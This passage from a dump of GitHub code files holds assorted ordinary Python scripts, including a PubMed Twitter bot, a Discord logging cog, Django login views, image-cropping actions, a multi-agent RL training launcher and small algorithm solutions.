dest=\"artmax\",\n default=15,\n help=\"Max articles to retrieve at 
each query. Default = 15\")\n parser.add_argument(\n '-topic',\n default=None,\n help=\"Topic to tweet about\")\n parser.add_argument(\n '-email',\n dest=\"entrez_email\",\n default=None,\n help=\"Email for NCBI Entrez.\")\n parser.add_argument(\n '-ck',\n dest=\"consumer_key\",\n default=None,\n help=\"Twitter consumer key\"\n )\n parser.add_argument(\n '-cs',\n dest=\"consumer_secret\",\n default=None,\n help=\"Twitter consumer secret\"\n )\n parser.add_argument(\n '-at',\n dest=\"access_token\",\n default=None,\n help=\"Twitter access token\"\n )\n parser.add_argument(\n '-ats',\n dest=\"access_token_secret\",\n default=None,\n help=\"Twitter access token secret\"\n )\n parser.add_argument(\n '-nak',\n dest=\"ncbi_api_key\",\n default=None,\n help=\"NCBI api key\"\n )\n\n args = parser.parse_args()\n\n doi_db = args.doi_db\n art_max = int(args.artmax)\n topic = args.topic\n entrez_email = args.entrez_email\n cons_key = args.consumer_key\n cons_secret = args.consumer_secret\n acc_tok = args.access_token\n acc_tok_sec = args.access_token_secret\n ncbi_key = args.ncbi_api_key\n\n return(doi_db, art_max, topic, entrez_email, cons_key, cons_secret, acc_tok, acc_tok_sec, ncbi_key)\n\n\nTOPIC_TO_SEARCH_AND_TWEET = \"a topic to search about on pubmed\"\nMAX_NB_ART_TO_GET = 15\nPATH_TO_DOI_DB = \"/path/to/doi_db.txt\"\n\n\ndef twitterbot(string_to_tweet, ck, cs, at, ats):\n '''\n Publish on twitter the string_to_tweet\n\n INPUT :\n string_to_tweet(str): text to tweet\n ck(str): Twitter consumer key\n cs(str): Twitter consumer secret\n at(str): Twitter access token\n ats(str): Twitter access token secret\n\n OUTPUT : None\n '''\n import tweepy\n login = tweepy.OAuthHandler(ck, cs)\n login.set_access_token(at, ats)\n this_api = tweepy.API(login)\n res = this_api.update_status(status=string_to_tweet)\n return(res)\n\n\ndef pubmed_search(search_term, nb_max_articles, entrez_email, ncbi_key):\n '''\n Search Pubmed for the nb_max_articles most recent articles on the\n search_term subject.\n\n INPUT : Search Term(str) and nb_max_articles(int)\n OUPUT : Dictionnary of Lists ['DOI':['Title','First Author','PubDate']]\n '''\n from Bio import Entrez\n\n article_dictionary = {}\n Entrez.email = entrez_email\n if ncbi_key:\n Entrez.api_key = ncbi_key\n max_number_of_articles = nb_max_articles\n\n myhandle = Entrez.esearch(db=\"pubmed\", term=search_term,\n retmax=max_number_of_articles)\n my_record = Entrez.read(myhandle)\n my_list = my_record[\"IdList\"]\n for article in range(0, len(my_list)):\n listId = my_list[article]\n my_secondary_handle = Entrez.esummary(db=\"pubmed\", id=listId)\n my_record = Entrez.read(my_secondary_handle)\n one_article = my_record[0]\n if len(one_article[\"AuthorList\"]) > 1:\n authorlist = one_article[\"AuthorList\"][0].encode(\n 'utf-8').decode(\"utf-8\")+\" et al.\"\n else:\n authorlist = one_article[\"AuthorList\"][0].encode(\n 'utf-8').decode(\"utf-8\")\n try:\n article_dictionary[one_article[\"DOI\"]] = [one_article[\"Title\"],\n authorlist, one_article[\"PubDate\"]]\n except:\n continue\n if ncbi_key:\n time.sleep(0.5)\n else:\n time.sleep(5)\n # break\n return(article_dictionary)\n\n\ndef string_shortener(string_to_shorten, max_size):\n '''\n Shortens titles strings that are more than max_size\n Returns shortened titled strings\n\n INPUT : title_string,max_size(str,int)\n OUPUT : shortened_title_string+\"...\"(str)\n EXAMPLE : title_shortener(title,40)\n '''\n if len(string_to_shorten) > max_size:\n return((string_to_shorten[0:max_size]+\"...\").capitalize())\n\n 
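# short enough already, so just capitalize it\n 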
return(string_to_shorten.capitalize())\n\n\ndef doi_tool(adoi, doi_db):\n '''\n Gets a DOI in input, and check if it already in doi_db.txt file.\n If yes returns \"already\", if not appends it to doi_db.txt and returns the\n direct link to the publication\n\n INPUT :\n DOI_identifier (string)\n doi_db(str): Path to doi.txt file\n OUTPUT : DOI url\n EXAMPLE : doi_tool (\"10.1371/journal.pone.0161211\")\n '''\n\n def doi_url_resolver(adoi):\n '''\n Gets a DOI in input and uses the dx.doi.org service to\n return article url\n\n INPUT : DOI(str)\n OUTPUT : DOI URL(str)\n EXAMPLE : adoi(\"10.1371/example.doi.42\")\n '''\n return(\"http://dx.doi.org/\"+str(adoi))\n\n def doi_checker(doi_string, doi_db):\n '''\n Gets a DOI in input, and check if it already in doi_db.txt file.\n If yes, returns TRUE, if not, returns FALSE and DOI\n\n INPUT :\n DOI(str)\n doi_db(str): Path to doi.txt file\n OUTPUT : True/False(Bool)\n EXAMPLE : doi_checker(\"10.1371/example.doi.42\")\n '''\n dois_list = []\n with open(doi_db, \"r\") as doi_db:\n for line in doi_db:\n line = line.rstrip()\n dois_list.append(line)\n if doi_string in dois_list:\n return(True, \"NA\")\n elif doi_string not in dois_list:\n dois_list.append(doi_string)\n return(False, doi_string)\n\n def doi_appender(doi_string, doi_db):\n '''\n Appends DOI in doi_db.txt\n\n INPUT :\n DOI(str)\n doi_db(str): Path to doi.txt file\n OUTPUT : None\n EXAMPLE : doi_appender(\"10.1371/example.doi.42\")\n '''\n with open(doi_db, \"a\") as doi_db:\n doi_db.write(doi_string+\"\\n\")\n\n if doi_checker(adoi, doi_db)[0] == False:\n doi_appender(doi_checker(adoi, doi_db)[1], doi_db)\n return(doi_url_resolver(adoi))\n else:\n return(\"already\")\n\n\nif __name__ == '__main__':\n DOI_DB, ART_MAX, TOPIC, ENTREZ_EMAIL, CONS_KEY, CONS_SECRET, ACC_TOK, ACC_TOK_SEC, NCBI_KEY = _get_args()\n print(\"> > > > \"+str(datetime.datetime.now()))\n myquery = pubmed_search(TOPIC, ART_MAX, ENTREZ_EMAIL, NCBI_KEY)\n\n for article in myquery:\n mystatus = doi_tool(article, DOI_DB)\n if mystatus != \"already\":\n print(\"DOI : \", article)\n print(\"URL : \", mystatus)\n print(\"Title : \", myquery[article]\n [0].encode('utf-8').decode(\"utf-8\"))\n # final_title = string_shortener(myquery[article][0],60)\n print(\"First Author : \",\n myquery[article][1])\n final_author = myquery[article][1]\n print(\"PubDate : \", myquery[article][2])\n final_date = myquery[article][2]\n final_url = mystatus\n hashtag = f\"#{TOPIC}\"\n try:\n almost_to_tweet = \" - \"+final_author+\" - \"+final_url+\" \"+hashtag\n max_title_len = 200 - len(almost_to_tweet)\n final_title = string_shortener(\n myquery[article][0].encode('utf-8').decode(\"utf-8\"), max_title_len)\n text_to_tweet = final_title+\" - \"+final_author+\" - \"+final_url+\" \"+hashtag\n print(text_to_tweet)\n print(\"tweet length :\", len(text_to_tweet))\n print(\"= = = = = = =\")\n if CONS_KEY and CONS_SECRET and ACC_TOK and ACC_TOK_SEC:\n res = twitterbot(text_to_tweet, CONS_KEY,\n CONS_SECRET, ACC_TOK, ACC_TOK_SEC)\n print(\"Twitter API response:\", res)\n time.sleep(10)\n except Exception as e:\n print(e)\n continue\n","repo_name":"maxibor/PubTwitMed","sub_path":"pubmed_twitter_bot.py","file_name":"pubmed_twitter_bot.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35631297008","text":"#!/usr/bin/env python3.7\n# -*- coding: utf-8 -*-\n\"\"\"DesignSPHysics Velocity Times Dialog \"\"\"\n\nfrom PySide import QtGui\n\nfrom 
mod.translation_tools import __\n\n\nclass VelocityTimesDialog(QtGui.QDialog):\n    \"\"\" Dialog with a table to create velocity times. \"\"\"\n\n    def __init__(self, relaxationzone, parent=None):\n        super().__init__(parent=parent)\n        self.relaxationzone = relaxationzone\n        self.velocity_times = relaxationzone.velocity_times\n\n        self.main_layout = QtGui.QVBoxLayout()\n        self.table = QtGui.QTableWidget(50, 2)\n        self.table.setHorizontalHeaderLabels([__(\"Time\"), __(\"Value\")])\n\n        self.button_layout = QtGui.QHBoxLayout()\n        self.cancel_button = QtGui.QPushButton(__(\"Cancel\"))\n        self.ok_button = QtGui.QPushButton(__(\"OK\"))\n        self.button_layout.addStretch(1)\n        self.button_layout.addWidget(self.cancel_button)\n        self.button_layout.addWidget(self.ok_button)\n\n        self.main_layout.addWidget(self.table)\n        self.main_layout.addLayout(self.button_layout)\n\n        self.setLayout(self.main_layout)\n        self.ok_button.clicked.connect(self.on_ok)\n        self.cancel_button.clicked.connect(self.on_cancel)\n        self.fill_data()\n\n    def fill_data(self):\n        \"\"\" Fills the data from the data structure onto the dialog. \"\"\"\n        for row, value in enumerate(self.velocity_times):\n            self.table.setItem(row, 0, QtGui.QTableWidgetItem(str(value[0])))\n            self.table.setItem(row, 1, QtGui.QTableWidgetItem(str(value[1])))\n\n    def on_cancel(self):\n        \"\"\" Closes the dialog rejecting it. \"\"\"\n        self.reject()\n\n    def on_ok(self):\n        \"\"\" Saves the dialog data onto the data structure. \"\"\"\n        self.velocity_times = list()\n        for i in range(self.table.rowCount()):\n            table_item_time: QtGui.QTableWidgetItem = self.table.item(i, 0)\n            table_item_value: QtGui.QTableWidgetItem = self.table.item(i, 1)\n            if table_item_time and table_item_value:\n                self.velocity_times.append([float(table_item_time.text()), float(table_item_value.text())])\n        self.accept()\n","repo_name":"DualSPHysics/DesignSPHysics","sub_path":"mod/widgets/velocity_times_dialog.py","file_name":"velocity_times_dialog.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"40"} {"seq_id":"20754039560","text":"import cv2\n\nimg = cv2.imread(\"butterfly.jpg\")\n\ncv2.imshow(\"display Image\",img)\nprint(img)\n\n# cv2.imread loads images in BGR channel order, so use COLOR_BGR2GRAY here\ngry_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Grayscale Image\",gry_img)\n\nprint(gry_img)\n\n\n\ncv2.waitKey(0)","repo_name":"harshitha-22/C104","sub_path":"black.py","file_name":"black.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"39418515877","text":"import os\nimport unittest\n\nfrom app.processors.base import ProcessorRegistry\n\nclass ProcessorRegistryTestCase(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        cls.processor_registry = ProcessorRegistry()\n    \n    def test_get_block_processors(self):\n        processors = self.processor_registry.get_block_processors()\n        self.assertTrue(processors)\n        # for processor in processors:\n        #     print(processor)\n    \n    def test_contracts_event_processors(self):\n        processors = self.processor_registry.get_event_processors('contracts', 'CodeStored')\n        self.assertTrue(processors)\n        # for processor in processors:\n        #     print(processor)\n\n    \nif __name__ == '__main__':\n    
unittest.main()\n","repo_name":"decooio/greenchain-explorer","sub_path":"harvester/app/test/test_processor_registry.py","file_name":"test_processor_registry.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31562330438","text":"import discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclass onMessageDelete(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if isinstance(message.author, discord.Embed) or message.author.bot:\n return \n channel = self.bot.get_channel(int(os.getenv(\"TXC_LOGGING\")))\n deleted_by = None\n if message.guild is not None:\n async for entry in message.guild.audit_logs(limit=1):\n if entry.target == message.author and entry.action == discord.AuditLogAction.message_delete:\n deleted_by = entry.user\n break\n embed = discord.Embed(\n title=f\"Activity Logging System\",\n description=f\"Message from {message.author.mention} deleted by: {deleted_by.mention}\" if deleted_by else f\"Message from {message.author.mention} deleted by himself\",\n color=discord.Color.red())\n embed.add_field(name=\"**Message:**\", value=message.content)\n embed.set_author(name=\"Beliauini Assist\", icon_url=os.getenv(\"LOGO\"))\n embed.set_thumbnail(url=os.getenv(\"LOGO\"))\n embed.set_footer(text=\"Beliauini Assist \\u00A9 2023 - \" + os.getenv(\"VERSION\"))\n if message.attachments:\n attach_url = message.attachments[0].url\n embed.set_image(url=attach_url)\n await channel.send(embed=embed)\n\nasync def setup(bot):\n await bot.add_cog(\n onMessageDelete(bot),\n guilds=[discord.Object(id=os.getenv(\"GUILD_ID\"))]\n )\n","repo_name":"Mightinity/project.beliauini","sub_path":"Beliauini-Assist-Program/events/onMessageDelete.py","file_name":"onMessageDelete.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10294404897","text":"# Definition for a binary tree node.\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \n def __str__(self):\n def inorder_str(node: Optional[TreeNode]) -> str:\n if node == None:\n return \"\"\n return inorder_str(node.left) + \" \" + str(node.val) + \" \" + inorder_str(node.right)\n return inorder_str(self)\n\nclass Solution:\n \n def trimBST(self, root: Optional[TreeNode], low: int, high: int) -> Optional[TreeNode]:\n if root == None:\n return root\n elif root.val < low:\n return self.trimBST(root.right, low, high)\n elif root.val > high:\n return self.trimBST(root.left, low, high)\n else:\n root.left = self.trimBST(root.left, low, high)\n root.right = self.trimBST(root.right, low, high)\n return root\n\n# Test \ns = Solution()\nprint(s.trimBST(TreeNode(1, TreeNode(0), TreeNode(2)), 1, 2))\nprint(s.trimBST(TreeNode(1, TreeNode(-1), TreeNode(2)), 0, 0))\nprint(s.trimBST(TreeNode(3, TreeNode(0, None, TreeNode(2, TreeNode(1))), TreeNode(4)), 1, 3))\n\n","repo_name":"ramzpat/leetcode_practice","sub_path":"assessments/20220730/trim_BST.py","file_name":"trim_BST.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72219399801","text":"#!/usr/bin/env python\r\nimport itertools\r\nimport logging\r\nimport 
os.path as osp\r\nimport os\r\n\r\nimport click\r\nimport gym\r\nimport ray\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = ''\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\n\r\n@ray.remote(num_cpus=1)\r\ndef train(logdir, env_id, lr, num_timesteps, seed, timesteps_per_batch, cont=False):\r\n from sandbox.ppo_sgd import cmlp_policy\r\n from sandbox.ppo_sgd import cmappo_simple\r\n from rl import logger\r\n from rl.common import set_global_seeds, tf_util as U\r\n from rl import bench\r\n\r\n from gym.envs.registration import register\r\n import multiagent\r\n import make_env\r\n\r\n logger.configure(logdir, format_strs=['stdout', 'log', 'json', 'tensorboard'])\r\n\r\n U.make_session(num_cpu=1).__enter__()\r\n set_global_seeds(seed)\r\n env = make_env.make_env(env_id)\r\n\r\n def policy_fn(name, ob_space, ac_space, index, all_ob_space):\r\n pi = cmlp_policy.MlpPolicy(\r\n name=name, ob_space=ob_space, ac_space=ac_space,\r\n hid_size=64, num_hid_layers=2, index=index, all_ob_space=all_ob_space\r\n )\r\n return pi\r\n\r\n env = bench.Monitor(env, logger.get_dir() and osp.join(logger.get_dir(), \"monitor.json\"), allow_early_resets=True)\r\n env.seed(seed)\r\n gym.logger.setLevel(logging.WARN)\r\n cmappo_simple.learn(\r\n env, policy_fn,\r\n max_timesteps=num_timesteps,\r\n timesteps_per_batch=timesteps_per_batch,\r\n clip_param=0.2, entcoeff=0.01,\r\n optim_epochs=4, optim_stepsize=lr, optim_batchsize=64,\r\n gamma=0.95, lam=0.95, schedule='linear', cont=cont\r\n )\r\n env.close()\r\n return None\r\n\r\n\r\n@click.command()\r\n@click.option('--logdir', default='/tmp', type=click.STRING)\r\n@click.option('--cont', is_flag=True, flag_value=True)\r\ndef main(logdir, cont):\r\n env_ids = [\r\n 'simple_speaker_listener'\r\n ]\r\n lrs = [\r\n 0.0001 # 0.0001, 0.003, 0.0005, 0.0001\r\n ]\r\n seeds = [1]\r\n batch_sizes = [50000]\r\n\r\n num_cpus = len(env_ids) * len(lrs) * len(seeds) * len(batch_sizes)\r\n # print(len(env_ids), len(lrs) , len(seeds) , len(batch_sizes))\r\n ray.init(num_cpus=num_cpus, num_gpus=0)\r\n print('Requesting {} cpus.'.format(num_cpus))\r\n\r\n jobs = [\r\n train.remote(\r\n logdir + '/exps/cmappo-sgd/' + env_id + '/l-{}-b-{}/seed-{}'.format(lr, batch_size, seed),\r\n env_id, lr, 1e7, seed, batch_size, cont)\r\n for env_id, lr, batch_size, seed in itertools.product(env_ids, lrs, batch_sizes, seeds)\r\n ]\r\n\r\n print(jobs)\r\n ray.get(jobs)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ermongroup/MA-AIRL","sub_path":"multi-agent-irl/sandbox/imitation/run_cmappo.py","file_name":"run_cmappo.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"40"} +{"seq_id":"22637365056","text":"import os\nimport rasterio\nfrom rasterio.merge import merge\nimport csv\n\n# Set the input directory path\ninput_dir = '/gws/nopw/j04/ai4er/users/map205/BigEarthNet-v1.0/'\n\n# Initialize list of source files to merge\nsrc_files_to_merge = []\n\n# Collect all subdirectories within the input directory\nsubdirs = [os.path.join(input_dir, name) for name in os.listdir(input_dir) if os.path.isdir(os.path.join(input_dir, name))]\n\n# Loop through subdirectories and add first .tif file to list of source files\nfor subdir in subdirs:\n tif_files = [os.path.join(subdir, name) for name in os.listdir(subdir) if name.endswith('.tif')]\n if len(tif_files) > 0:\n src_files_to_merge.append(tif_files[0])\n\n# Divide the input files into batches of 1,000\nfile_batches = [src_files_to_merge[i:i+1000] for i in 
range(0, len(src_files_to_merge), 1000)]\n\n# Loop through each batch and merge the files\nfor i, batch in enumerate(file_batches):\n # Open all .tif files in the current batch using rasterio\n src_files = [rasterio.open(f) for f in batch]\n\n # Merge the .tif files using rasterio.merge\n merged, out_transform = merge(src_files)\n\n # Set the output file path and metadata\n output_file = f'/gws/nopw/j04/ai4er/users/map205/mres/global_merged_file_{i}.tif'\n out_meta = src_files[0].meta.copy()\n out_meta.update({'driver': 'GTiff',\n 'height': merged.shape[1],\n 'width': merged.shape[2],\n 'transform': out_transform})\n\n # Write the merged .tif file to disk\n with rasterio.open(output_file, 'w', **out_meta) as dst:\n dst.write(merged)\n \n # Close all the opened source files\n for src_file in src_files:\n src_file.close()\n\n# Save the filenames of the original .tif files for this batch in a .csv file\n filenames_file = f'/gws/nopw/j04/ai4er/users/map205/mres/global_merged_file_{i}_filenames.csv'\n with open(filenames_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n for src_file in src_files:\n writer.writerow([src_file.name])\n\n","repo_name":"maplumridge/land-cover-classification","sub_path":"merge_files.py","file_name":"merge_files.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33892341123","text":"import numpy as np\nS = input()\nT = input()\n\nnS = np.array([s for s in S])\nnT = np.array([s for s in T])\nFalse_position = np.where(nS!=nT)[0]\n# import ipdb; ipdb.set_trace()\nfor i in False_position:\n if S[i] != T[i]:\n S = S.translate(str.maketrans({S[i]:T[i], T[i]:S[i]}))\nif S == T:\n print('Yes')\nelse:\n print('No')","repo_name":"SkiMsyk/AtCoder","sub_path":"BeginnerContest110/C_StringTransformation.py","file_name":"C_StringTransformation.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71315616439","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\n\nfrom .forms import UserForm\n\nfrom django.contrib import messages\n\n@login_required\ndef index(request):\n if request.user.roles == 'ผู้ดูแล':\n return redirect('/adm/')\n elif request.user.roles == 'หัวหน้างาน':\n return redirect('/manager/')\n elif request.user.roles == 'พนักงาน':\n return redirect('/employee/')\n elif request.user.is_superuser == 'พนักงาน':\n return redirect('/admin/')\n else:\n return redirect('/logout/')\n\ndef login(request):\n messages=\"\"\n if request.user.is_authenticated:\n return redirect('/')\n elif request.method == 'POST':\n user = authenticate(request ,\n username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n auth_login(request, user)\n return redirect('/')\n else:\n messages = 'Username หรือ Password ไม่ถูกต้อง'\n return render(request,'login.html',{\n \"messages\":messages\n })\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('/')\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect('/')\n else:\n if request.method== 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n print(\"invalid\")\n else:\n 
form = UserForm()\n        return render(request,'register.html',{'form':form})\n","repo_name":"thanapatKJ/FactoryApp","sub_path":"FactoryApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"35005812889","text":"import os\nfrom typing import Iterator, Optional\n\nfrom imgutils.detect import detect_person, detect_heads, detect_halfbody, detect_eyes\n\nfrom .base import BaseAction\nfrom ..model import ImageItem\n\n\nclass PersonSplitAction(BaseAction):\n    def __init__(self, keep_original: bool = False, level: str = 'm', version: str = 'v1.1',\n                 conf_threshold: float = 0.3, iou_threshold: float = 0.5, keep_origin_tags: bool = False):\n        self.keep_original = keep_original\n        self.level = level\n        self.version = version\n        self.conf_threshold = conf_threshold\n        self.iou_threshold = iou_threshold\n        self.keep_origin_tags = keep_origin_tags\n\n    def iter(self, item: ImageItem) -> Iterator[ImageItem]:\n        detection = detect_person(item.image, self.level, self.version,\n                                  conf_threshold=self.conf_threshold, iou_threshold=self.iou_threshold)\n\n        if 'filename' in item.meta:\n            filename = item.meta['filename']\n            filebody, ext = os.path.splitext(filename)\n        else:\n            filebody, ext = None, None\n\n        if self.keep_original:\n            yield item\n\n        for i, (area, type_, score) in enumerate(detection):\n            new_meta = {\n                **item.meta,\n                'crop': {'type': type_, 'score': score},\n            }\n            if 'tags' in new_meta and not self.keep_origin_tags:\n                del new_meta['tags']\n            if filebody is not None:\n                new_meta['filename'] = f'{filebody}_person{i}{ext}'\n            yield ImageItem(item.image.crop(area), new_meta)\n\n    def reset(self):\n        pass\n\n\nclass ThreeStageSplitAction(BaseAction):\n    def __init__(self, person_conf: Optional[dict] = None, halfbody_conf: Optional[dict] = None,\n                 head_conf: Optional[dict] = None, head_scale: float = 1.5,\n                 split_eyes: bool = False, eye_conf: Optional[dict] = None, eye_scale: float = 2.4,\n                 split_person: bool = True, keep_origin_tags: bool = False):\n        self.person_conf = dict(person_conf or {})\n        self.halfbody_conf = dict(halfbody_conf or {})\n        self.head_conf = dict(head_conf or {})\n        self.eye_conf = dict(eye_conf or {})\n        self.head_scale = head_scale\n        self.eye_scale = eye_scale\n        self.split_eyes = split_eyes\n        self.split_person = split_person\n        self.keep_origin_tags = keep_origin_tags\n\n    def _split_person(self, item: ImageItem, filebody, ext):\n        if self.split_person:\n            for i, (px, type_, score) in enumerate(detect_person(item.image, **self.person_conf), start=1):\n                person_image = item.image.crop(px)\n                person_meta = {\n                    **item.meta,\n                    'crop': {'type': type_, 'score': score},\n                }\n                if 'tags' in person_meta and not self.keep_origin_tags:\n                    del person_meta['tags']\n                if filebody is not None:\n                    person_meta['filename'] = f'{filebody}_person{i}{ext}'\n                yield i, ImageItem(person_image, person_meta)\n\n        else:\n            yield 1, item\n\n    def iter(self, item: ImageItem) -> Iterator[ImageItem]:\n        if 'filename' in item.meta:\n            filename = item.meta['filename']\n            filebody, ext = os.path.splitext(filename)\n        else:\n            filebody, ext = None, None\n\n        for i, person_item in self._split_person(item, filebody, ext):\n            person_image = person_item.image\n            yield person_item\n\n            half_detects = detect_halfbody(person_image, **self.halfbody_conf)\n            if half_detects:\n                halfbody_area, halfbody_type, halfbody_score = half_detects[0]\n                halfbody_image = person_image.crop(halfbody_area)\n                halfbody_meta = {\n                    
**item.meta,\n 'crop': {'type': halfbody_type, 'score': halfbody_score},\n }\n if 'tags' in halfbody_meta and not self.keep_origin_tags:\n del halfbody_meta['tags']\n if filebody is not None:\n halfbody_meta['filename'] = f'{filebody}_person{i}_halfbody{ext}'\n yield ImageItem(halfbody_image, halfbody_meta)\n\n head_detects = detect_heads(person_image, **self.head_conf)\n if head_detects:\n (hx0, hy0, hx1, hy1), head_type, head_score = head_detects[0]\n cx, cy = (hx0 + hx1) / 2, (hy0 + hy1) / 2\n width, height = hx1 - hx0, hy1 - hy0\n width = height = max(width, height) * self.head_scale\n x0, y0 = int(max(cx - width / 2, 0)), int(max(cy - height / 2, 0))\n x1, y1 = int(min(cx + width / 2, person_image.width)), int(min(cy + height / 2, person_image.height))\n head_image = person_image.crop((x0, y0, x1, y1))\n head_meta = {\n **item.meta,\n 'crop': {'type': head_type, 'score': head_score},\n }\n if 'tags' in head_meta and not self.keep_origin_tags:\n del head_meta['tags']\n if filebody is not None:\n head_meta['filename'] = f'{filebody}_person{i}_head{ext}'\n yield ImageItem(head_image, head_meta)\n\n if self.split_eyes:\n eye_detects = detect_eyes(head_image, **self.eye_conf)\n for j, ((ex0, ey0, ex1, ey1), eye_type, eye_score) in enumerate(eye_detects):\n cx, cy = (ex0 + ex1) / 2, (ey0 + ey1) / 2\n width, height = ex1 - ex0, ey1 - ey0\n width = height = max(width, height) * self.eye_scale\n x0, y0 = int(max(cx - width / 2, 0)), int(max(cy - height / 2, 0))\n x1, y1 = int(min(cx + width / 2, head_image.width)), \\\n int(min(cy + height / 2, head_image.height))\n eye_image = head_image.crop((x0, y0, x1, y1))\n eye_meta = {\n **item.meta,\n 'crop': {'type': eye_type, 'score': eye_score},\n }\n if 'tags' in eye_meta and not self.keep_origin_tags:\n del eye_meta['tags']\n if filebody is not None:\n eye_meta['filename'] = f'{filebody}_person{i}_head_eye{j}{ext}'\n yield ImageItem(eye_image, eye_meta)\n\n def reset(self):\n pass\n","repo_name":"deepghs/waifuc","sub_path":"waifuc/action/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"40"} +{"seq_id":"71758305720","text":"import contextlib as __ctxlib\n\nfrom solders.solders import __version__ as _version_untyped # type: ignore\nfrom solders.solders import (\n account,\n account_decoder,\n address_lookup_table_account,\n clock,\n commitment_config,\n compute_budget,\n epoch_info,\n epoch_schedule,\n errors,\n hash,\n instruction,\n keypair,\n message,\n null_signer,\n presigner,\n pubkey,\n rent,\n rpc,\n signature,\n token,\n transaction,\n transaction_status,\n)\n\nfrom . 
import system_program, sysvar\n\n__has_bankrun = False\nwith __ctxlib.suppress(ImportError):\n from solders.solders import bankrun\n\n __has_bankrun = True\n\n\n__all_core = [\n \"account_decoder\",\n \"address_lookup_table_account\",\n \"commitment_config\",\n \"errors\",\n \"hash\",\n \"instruction\",\n \"keypair\",\n \"message\",\n \"null_signer\",\n \"presigner\",\n \"pubkey\",\n \"rpc\",\n \"signature\",\n \"token\",\n \"transaction\",\n \"transaction_status\",\n \"sysvar\",\n \"system_program\",\n]\n\n__all__ = [*__all_core, \"bankrun\"] if __has_bankrun else __all_core\n\n__version__: str = _version_untyped\n","repo_name":"kevinheavey/solders","sub_path":"python/solders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"40"} +{"seq_id":"11399214799","text":"import PySimpleGUI as sg\nfrom entidade.usuario import Usuario\nfrom persistencia.usuario_dao import UsuarioDAO\nfrom limite.tela_usuario import TelaUsuario\nfrom limite.tela_altera_usuario import TelaAlteraUsuario\nfrom limite.tela_cadastro_usuario import TelaCadastroUsuario\nfrom limite.tela_seleciona_codigo import TelaSelecionaCodigo\nfrom limite.tela_remove_usuario import TelaRemoveUsuario\nfrom limite.tela_lista_entidades import TelaListaEntidades\n\nclass ControladorUsuario:\n\n def __init__(self, controlador_sistema):\n self.__usuario_dao = UsuarioDAO()\n self.__tela_usuario = TelaUsuario()\n self.__tela_cadastro_usuario = TelaCadastroUsuario()\n self.__tela_seleciona_codigo = TelaSelecionaCodigo()\n self.__tela_altera_usuario = TelaAlteraUsuario()\n self.__tela_remove_usuario = TelaRemoveUsuario()\n self.__tela_lista_entidades = TelaListaEntidades()\n self.__controlador_sistema = controlador_sistema\n\n @property\n def usuarios(self):\n return self.__usuario_dao.get_all()\n\n def inclui_usuario(self):\n self.__tela_cadastro_usuario.init_components()\n while True:\n botao, valores = self.__tela_cadastro_usuario.open(self.__usuario_dao.get_all_keys())\n\n if botao == 'incluir':\n if valores is not None:\n usuario = Usuario(valores['nome'], valores['codigo'])\n self.__usuario_dao.persist(usuario)\n self.__tela_usuario.show_message('Usuário adicionado!', f'O usuário {usuario.codigo} - {usuario.nome} foi adicionado.')\n break\n else:\n break\n\n def altera_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message(\"Erro!\", \"Não existem usuários cadastrados!\")\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n self.__tela_altera_usuario.init_components(usuario_encontrado)\n while True:\n botao, novo_nome = self.__tela_altera_usuario.open()\n if botao == 'alterar':\n if novo_nome 